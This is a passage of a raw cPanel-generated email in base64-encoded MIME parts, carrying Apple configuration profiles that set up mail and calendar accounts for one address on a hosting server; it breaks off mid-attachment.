ICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAog ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAg ICAgICAgICAKPD94cGFja2V0IGVuZD0idyI/Ph0AdIcAAAAgY0hSTQAAeiUAAICDAAD5/wAAgOkA AHUwAADqYAAAOpgAABdvkl/FRgAAAclJREFUeNrs1s+LjVEYB/DPHe7EYjY2wsaPjaZBZDQLEZGF hSwkNdlIWbC2UEr5D8ZGSX4sJJINaQjlNkn5lcVMSuSWaagZXImYrsU8N6fT6/JOkcV869T7nOc5 53vO83yf930rzWbT30aHf4AZklKYDQ6tKLvmODZiFpqo4CvquIlzmAQDz4KkHNbjcBv/HvTHGJ1u unb9QcxmXEHX70g6UI30VNEZ6enN4ibxrWB9H/YWkczBPlzCYzyN8QS30YNlSfwo1mElNuFatt/O n4WfwgJciIIW4QHmY14ydxeP4nkEDzGMRTG3NL1JJ862IYAaVmVz+ckbmCiW8FQxt2a+LyFLIc2T OJ/4v8ftUuzH8sSupyQ7suCLOIJP0QMTkaa0oV7gPQbQHUpaG/Et3ElJ+hLHmzhRIyPuxdzEvoqD MYrwDqfTmnRlaWoULNqS2UNtavg55Ps6JRlJApbgaPRGC1VsS+yP+IDVBZtfDjnfyAt/PUlZBcew O2oyhBNYnGz2KvpneyaEMbz8lbrO4AAWJr7uRJY9IfMWBqPotTKv+nqcfKwgZrBA3rem+z2pYQNO 4TnG8Rb3sCbs8cj1/TIklZkfif+O5McA9Y1iuiAu5qQAAAAASUVORK5CYII= --related-Cpanel::Email::Object-3140096-1726644806-0.701349747714662-- --alternative-Cpanel::Email::Object-3140096-1726644806-0.10170792754726-- --mixed-Cpanel::Email::Object-3140096-1726644806-0.561888666747986 Content-Type: application/octet-stream; x-unix-mode=0600; name="email-rudolph.perry@bloomingcostamices.com.mobileconfig" Content-Disposition: attachment; filename="email-rudolph.perry@bloomingcostamices.com.mobileconfig" Content-Transfer-Encoding: base64 MIIY2AYJKoZIhvcNAQcCoIIYyTCCGMUCAQExDzANBglghkgBZQMEAgEFADCCDEYGCSqGSIb3DQEH AaCCDDcEggwzPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4NCjwhRE9DVFlQ RSBwbGlzdCBQVUJMSUMgIi0vL0FwcGxlLy9EVEQgUExJU1QgMS4wLy9FTiIgImh0dHA6Ly93d3cu YXBwbGUuY29tL0RURHMvUHJvcGVydHlMaXN0LTEuMC5kdGQiPg0KPHBsaXN0IHZlcnNpb249IjEu MCI+DQo8ZGljdD4NCiAgPGtleT5QYXlsb2FkQ29udGVudDwva2V5Pg0KICA8YXJyYXk+DQogICAg PGRpY3Q+DQogICAgICA8a2V5PkVtYWlsQWNjb3VudERlc2NyaXB0aW9uPC9rZXk+DQogICAgICA8 c3RyaW5nPnJ1ZG9scGgucGVycnlAYmxvb21pbmdjb3N0YW1pY2VzLmNvbTwvc3RyaW5nPg0KICAg ICAgPGtleT5FbWFpbEFjY291bnROYW1lPC9rZXk+DQogICAgICA8c3RyaW5nPnJ1ZG9scGgucGVy cnlAYmxvb21pbmdjb3N0YW1pY2VzLmNvbTwvc3RyaW5nPg0KICAgICAgPGtleT5FbWFpbEFjY291 bnRUeXBlPC9rZXk+DQogICAgICA8c3RyaW5nPkVtYWlsVHlwZUlNQVA8L3N0cmluZz4NCiAgICAg IDxrZXk+RW1haWxBZGRyZXNzPC9rZXk+DQogICAgICA8c3RyaW5nPnJ1ZG9scGgucGVycnlAYmxv b21pbmdjb3N0YW1pY2VzLmNvbTwvc3RyaW5nPg0KICAgICAgPGtleT5JbmNvbWluZ01haWxTZXJ2 ZXJBdXRoZW50aWNhdGlvbjwva2V5Pg0KICAgICAgPHN0cmluZz5FbWFpbEF1dGhQYXNzd29yZDwv c3RyaW5nPg0KICAgICAgPGtleT5JbmNvbWluZ01haWxTZXJ2ZXJIb3N0TmFtZTwva2V5Pg0KICAg ICAgPHN0cmluZz5tZ2gtd2ViMTEubWFnaG9zdC5ybzwvc3RyaW5nPg0KICAgICAgPGtleT5JbmNv bWluZ01haWxTZXJ2ZXJQb3J0TnVtYmVyPC9rZXk+DQogICAgICA8aW50ZWdlcj45OTM8L2ludGVn ZXI+DQogICAgICA8a2V5PkluY29taW5nTWFpbFNlcnZlclVzZVNTTDwva2V5Pg0KICAgICAgPHRy dWUvPg0KICAgICAgPGtleT5JbmNvbWluZ01haWxTZXJ2ZXJVc2VybmFtZTwva2V5Pg0KICAgICAg PHN0cmluZz5ydWRvbHBoLnBlcnJ5QGJsb29taW5nY29zdGFtaWNlcy5jb208L3N0cmluZz4NCiAg ICAgIDxrZXk+T3V0Z29pbmdNYWlsU2VydmVyQXV0aGVudGljYXRpb248L2tleT4NCiAgICAgIDxz dHJpbmc+RW1haWxBdXRoUGFzc3dvcmQ8L3N0cmluZz4NCiAgICAgIDxrZXk+T3V0Z29pbmdNYWls U2VydmVySG9zdE5hbWU8L2tleT4NCiAgICAgIDxzdHJpbmc+bWdoLXdlYjExLm1hZ2hvc3Qucm88 L3N0cmluZz4NCiAgICAgIDxrZXk+T3V0Z29pbmdNYWlsU2VydmVyUG9ydE51bWJlcjwva2V5Pg0K ICAgICAgPGludGVnZXI+NDY1PC9pbnRlZ2VyPg0KICAgICAgPGtleT5PdXRnb2luZ01haWxTZXJ2 ZXJVc2VTU0w8L2tleT4NCiAgICAgIDx0cnVlLz4NCiAgICAgIDxrZXk+T3V0Z29pbmdNYWlsU2Vy dmVyVXNlcm5hbWU8L2tleT4NCiAgICAgIDxzdHJpbmc+cnVkb2xwaC5wZXJyeUBibG9vbWluZ2Nv c3RhbWljZXMuY29tPC9zdHJpbmc+DQogICAgICA8a2V5Pk91dGdvaW5nUGFzc3dvcmRTYW1lQXNJ bmNvbWluZ1Bhc3N3b3JkPC9rZXk+DQogICAgICA8dHJ1ZS8+DQogICAgICA8a2V5PlBheWxvYWRE ZXNjcmlwdGlvbjwva2V5Pg0KICAgICAgPHN0cmluZz5ydWRvbHBoLnBlcnJ5QGJsb29taW5nY29z dGFtaWNlcy5jb20gU2VjdXJlIEVtYWlsIFNldHVwPC9zdHJpbmc+DQogICAgICA8a2V5PlBheWxv YWREaXNwbGF5TmFtZTwva2V5Pg0KICAgICAgPHN0cmluZz5ydWRvbHBoLnBlcnJ5QGJsb29taW5n Y29zdGFtaWNlcy5jb20gU2VjdXJlIEVtYWlsIFNldHVwPC9zdHJpbmc+DQogICAgICA8a2V5PlBh eWxvYWRJZGVudGlmaWVyPC9rZXk+DQogICAgICA8c3RyaW5nPmNwYW5lbC5tYWlsLm9yZy5ydWRv bHBoLnBlcnJ5LmJsb29taW5nY29zdGFtaWNlcy5jb208L3N0cmluZz4NCiAgICAgIDxrZXk+UGF5 bG9hZE9yZ2FuaXphdGlvbjwva2V5Pg0KICAgICAgPHN0cmluZz5ibG9vbWluZ2Nvc3RhbWljZXMu Y29tPC9zdHJpbmc+DQogICAgICA8a2V5PlBheWxvYWRUeXBlPC9rZXk+DQogICAgICA8c3RyaW5n PmNvbS5hcHBsZS5tYWlsLm1hbmFnZWQ8L3N0cmluZz4NCiAgICAgIDxrZXk+UGF5bG9hZFVVSUQ8 L2tleT4NCiAgICAgIDxzdHJpbmc+YWQ3NWY4NDgtZDk4NS0zMWYwLTg4YmMtNzg0Mjc5Mjg5N2I4 PC9zdHJpbmc+DQogICAgICA8a2V5PlBheWxvYWRWZXJzaW9uPC9rZXk+DQogICAgICA8aW50ZWdl cj4xPC9pbnRlZ2VyPg0KICAgICAgPGtleT5QcmV2ZW50QXBwU2hlZXQ8L2tleT4NCiAgICAgIDxm YWxzZS8+DQogICAgICA8a2V5PlByZXZlbnRNb3ZlPC9rZXk+DQogICAgICA8ZmFsc2UvPg0KICAg ICAgPGtleT5TTUlNRUVuYWJsZWQ8L2tleT4NCiAgICAgIDxmYWxzZS8+DQogICAgICA8a2V5Pklu Y29taW5nTWFpbFNlcnZlcklNQVBQYXRoUHJlZml4PC9rZXk+DQogICAgICA8c3RyaW5nPklOQk9Y PC9zdHJpbmc+DQogICAgPC9kaWN0Pg0KICA8L2FycmF5Pg0KICA8a2V5PlBheWxvYWREZXNjcmlw dGlvbjwva2V5Pg0KICA8c3RyaW5nPnJ1ZG9scGgucGVycnlAYmxvb21pbmdjb3N0YW1pY2VzLmNv bSBTZWN1cmUgRW1haWwgU2V0dXA8L3N0cmluZz4NCiAgPGtleT5QYXlsb2FkRGlzcGxheU5hbWU8 L2tleT4NCiAgPHN0cmluZz5ydWRvbHBoLnBlcnJ5QGJsb29taW5nY29zdGFtaWNlcy5jb20gU2Vj dXJlIEVtYWlsIFNldHVwPC9zdHJpbmc+DQogIDxrZXk+UGF5bG9hZElkZW50aWZpZXI8L2tleT4N CiAgPHN0cmluZz5jcGFuZWwubWFpbC5vcmcucnVkb2xwaC5wZXJyeS5ibG9vbWluZ2Nvc3RhbWlj ZXMuY29tLWVtYWlsPC9zdHJpbmc+DQogIDxrZXk+UGF5bG9hZE9yZ2FuaXphdGlvbjwva2V5Pg0K ICA8c3RyaW5nPmNwYW5lbC5tYWlsLm9yZy5ydWRvbHBoLnBlcnJ5LmJsb29taW5nY29zdGFtaWNl cy5jb208L3N0cmluZz4NCiAgPGtleT5QYXlsb2FkUmVtb3ZhbERpc2FsbG93ZWQ8L2tleT4NCiAg PGZhbHNlLz4NCiAgPGtleT5QYXlsb2FkVHlwZTwva2V5Pg0KICA8c3RyaW5nPkNvbmZpZ3VyYXRp b248L3N0cmluZz4NCiAgPGtleT5QYXlsb2FkVVVJRDwva2V5Pg0KICA8c3RyaW5nPjUwOWUxOGE2 LTc1NzQtZDg1Mi1lMWU0LWQzY2E0Y2ZmZTIxMDwvc3RyaW5nPg0KICA8a2V5PlBheWxvYWRWZXJz aW9uPC9rZXk+DQogIDxpbnRlZ2VyPjE8L2ludGVnZXI+DQo8L2RpY3Q+DQo8L3BsaXN0Pg0KoIIK BDCCBQUwggLtoAMCAQICEEuoUpP3mi+icwZLqASNddAwDQYJKoZIhvcNAQELBQAwTzELMAkGA1UE BhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2VhcmNoIEdyb3VwMRUwEwYDVQQD EwxJU1JHIFJvb3QgWDEwHhcNMjQwMzEzMDAwMDAwWhcNMjcwMzEyMjM1OTU5WjAzMQswCQYDVQQG EwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEMMAoGA1UEAxMDUjEwMIIBIjANBgkqhkiG9w0B AQEFAAOCAQ8AMIIBCgKCAQEAz1fl5sRUEu20R/7JJ1h2RlAojB0+iN8FndW1GCm93bVav/r2zqO+ rwAhS2JaWjwBL8VYA/aJ/44RQ+vBteAUB5aPbx/X57qBOQl1ZbfCrxhbNyYo56P0ByttGv+rWLyV rkD/6ctXxLVbf3gNGGG8F+dUxrtJkc1uGNGAhe6mZTa8dOq8UEzq/CHzOBaTlLqw02s4Bs0WEnrK UnXIrXaywpxdmEVcb2F7xi3uPBNShgHZV+Y4HN+NtR+SkZrnShzMRahyVfCw5qMH7P2nG2aeP0iL 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 --mixed-Cpanel::Email::Object-3140096-1726644806-0.561888666747986 Content-Type: application/octet-stream; x-unix-mode=0600; name="caldav-rudolph.perry@bloomingcostamices.com.mobileconfig" Content-Disposition: attachment; filename="caldav-rudolph.perry@bloomingcostamices.com.mobileconfig" Content-Transfer-Encoding: base64 MIIVIwYJKoZIhvcNAQcCoIIVFDCCFRACAQExDzANBglghkgBZQMEAgEFADCCCJEGCSqGSIb3DQEH AaCCCIIEggh+PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4NCjwhRE9DVFlQ RSBwbGlzdCBQVUJMSUMgIi0vL0FwcGxlLy9EVEQgUExJU1QgMS4wLy9FTiIgImh0dHA6Ly93d3cu YXBwbGUuY29tL0RURHMvUHJvcGVydHlMaXN0LTEuMC5kdGQiPg0KPHBsaXN0IHZlcnNpb249IjEu MCI+DQo8ZGljdD4NCiAgPGtleT5QYXlsb2FkQ29udGVudDwva2V5Pg0KICA8YXJyYXk+DQogICAg PGRpY3Q+DQogICAgICAgIDxrZXk+Q2FsREFWQWNjb3VudERlc2NyaXB0aW9uPC9rZXk+DQogICAg ICAgIDxzdHJpbmc+cnVkb2xwaC5wZXJyeUBibG9vbWluZ2Nvc3RhbWljZXMuY29tPC9zdHJpbmc+ DQogICAgICAgIDxrZXk+Q2FsREFWSG9zdE5hbWU8L2tleT4NCiAgICAgICAgPHN0cmluZz5tZ2gt d2ViMTEubWFnaG9zdC5ybzwvc3RyaW5nPg0KICAgICAgICA8a2V5PkNhbERBVlBvcnQ8L2tleT4N CiAgICAgICAgPGludGVnZXI+MjA4MDwvaW50ZWdlcj4NCiAgICAgICAgPGtleT5DYWxEQVZQcmlu Y2lwYWxVUkw8L2tleT4NCiAgICAgICAgPHN0cmluZz4vcHJpbmNpcGFscy9ydWRvbHBoLnBlcnJ5 QGJsb29taW5nY29zdGFtaWNlcy5jb208L3N0cmluZz4NCiAgICAgICAgPGtleT5DYWxEQVZVc2VT U0w8L2tleT4NCiAgICAgICAgPHRydWUvPg0KICAgICAgICA8a2V5PkNhbERBVlVzZXJuYW1lPC9r ZXk+DQogICAgICAgIDxzdHJpbmc+cnVkb2xwaC5wZXJyeUBibG9vbWluZ2Nvc3RhbWljZXMuY29t PC9zdHJpbmc+DQogICAgICAgIDxrZXk+UGF5bG9hZERlc2NyaXB0aW9uPC9rZXk+DQogICAgICAg IDxzdHJpbmc+cnVkb2xwaC5wZXJyeUBibG9vbWluZ2Nvc3RhbWljZXMuY29tIFNlY3VyZSBDYWxl bmRhciBTZXR1cDwvc3RyaW5nPg0KICAgICAgICA8a2V5PlBheWxvYWREaXNwbGF5TmFtZTwva2V5 Pg0KICAgICAgICA8c3RyaW5nPnJ1ZG9scGgucGVycnlAYmxvb21pbmdjb3N0YW1pY2VzLmNvbSBT ZWN1cmUgQ2FsZW5kYXIgU2V0dXA8L3N0cmluZz4NCiAgICAgICAgPGtleT5QYXlsb2FkSWRlbnRp Zmllcjwva2V5Pg0KICAgICAgICA8c3RyaW5nPmNwYW5lbC5tYWlsLm9yZy5ydWRvbHBoLnBlcnJ5 LmJsb29taW5nY29zdGFtaWNlcy5jb208L3N0cmluZz4NCiAgICAgICAgPGtleT5QYXlsb2FkT3Jn YW5pemF0aW9uPC9rZXk+DQogICAgICAgIDxzdHJpbmc+Ymxvb21pbmdjb3N0YW1pY2VzLmNvbTwv c3RyaW5nPg0KICAgICAgICA8a2V5PlBheWxvYWRUeXBlPC9rZXk+DQogICAgICAgIDxzdHJpbmc+ Y29tLmFwcGxlLmNhbGRhdi5hY2NvdW50PC9zdHJpbmc+DQogICAgICAgIDxrZXk+UGF5bG9hZFVV SUQ8L2tleT4NCiAgICAgICAgPHN0cmluZz4wNmY0ZTQyOS1mOGM1LWQwZDktZjNjMC1hNzNhYjJl Mzc1NTA8L3N0cmluZz4NCiAgICAgICAgPGtleT5QYXlsb2FkVmVyc2lvbjwva2V5Pg0KICAgICAg ICA8aW50ZWdlcj4xPC9pbnRlZ2VyPg0KICAgIDwvZGljdD4NCiAgPC9hcnJheT4NCiAgPGtleT5Q YXlsb2FkRGVzY3JpcHRpb248L2tleT4NCiAgPHN0cmluZz5ydWRvbHBoLnBlcnJ5QGJsb29taW5n Y29zdGFtaWNlcy5jb20gU2VjdXJlIENhbGVuZGFyIFNldHVwPC9zdHJpbmc+DQogIDxrZXk+UGF5 bG9hZERpc3BsYXlOYW1lPC9rZXk+DQogIDxzdHJpbmc+cnVkb2xwaC5wZXJyeUBibG9vbWluZ2Nv c3RhbWljZXMuY29tIFNlY3VyZSBDYWxlbmRhciBTZXR1cDwvc3RyaW5nPg0KICA8a2V5PlBheWxv YWRJZGVudGlmaWVyPC9rZXk+DQogIDxzdHJpbmc+Y3BhbmVsLm1haWwub3JnLnJ1ZG9scGgucGVy cnkuYmxvb21pbmdjb3N0YW1pY2VzLmNvbS1jYWxkYXY8L3N0cmluZz4NCiAgPGtleT5QYXlsb2Fk T3JnYW5pemF0aW9uPC9rZXk+DQogIDxzdHJpbmc+Y3BhbmVsLm1haWwub3JnLnJ1ZG9scGgucGVy cnkuYmxvb21pbmdjb3N0YW1pY2VzLmNvbTwvc3RyaW5nPg0KICA8a2V5PlBheWxvYWRSZW1vdmFs RGlzYWxsb3dlZDwva2V5Pg0KICA8ZmFsc2UvPg0KICA8a2V5PlBheWxvYWRUeXBlPC9rZXk+DQog IDxzdHJpbmc+Q29uZmlndXJhdGlvbjwvc3RyaW5nPg0KICA8a2V5PlBheWxvYWRVVUlEPC9rZXk+ DQogIDxzdHJpbmc+YTk4MTkzNTQtN2VhOC00YWI0LTEyZTAtNTFhNzM5MWFlM2Q1PC9zdHJpbmc+ DQogIDxrZXk+UGF5bG9hZFZlcnNpb248L2tleT4NCiAgPGludGVnZXI+MTwvaW50ZWdlcj4NCjwv ZGljdD4NCjwvcGxpc3Q+DQqgggoEMIIFBTCCAu2gAwIBAgIQS6hSk/eaL6JzBkuoBI110DANBgkq hkiG9w0BAQsFADBPMQswCQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVz ZWFyY2ggR3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMTAeFw0yNDAzMTMwMDAwMDBaFw0yNzAz MTIyMzU5NTlaMDMxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQwwCgYDVQQD EwNSMTAwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDPV+XmxFQS7bRH/sknWHZGUCiM HT6I3wWd1bUYKb3dtVq/+vbOo76vACFLYlpaPAEvxVgD9on/jhFD68G14BQHlo9vH9fnuoE5CXVl t8KvGFs3Jijno/QHK20a/6tYvJWuQP/py1fEtVt/eA0YYbwX51TGu0mRzW4Y0YCF7qZlNrx06rxQ TOr8IfM4FpOUurDTazgGzRYSespSdcitdrLCnF2YRVxvYXvGLe48E1KGAdlX5jgc3421H5KRmudK HMxFqHJV8LDmowfs/acbZp4/SItxhHFYyTr6717yW0QrPHTnj7JHwQdqzZq3DZb3EoEmUVQK7GH2 9/Xi8orIlQ2NAgMBAAGjgfgwgfUwDgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMC BggrBgEFBQcDATASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBS7vMNHpeS8qcbDpHIMEI2i 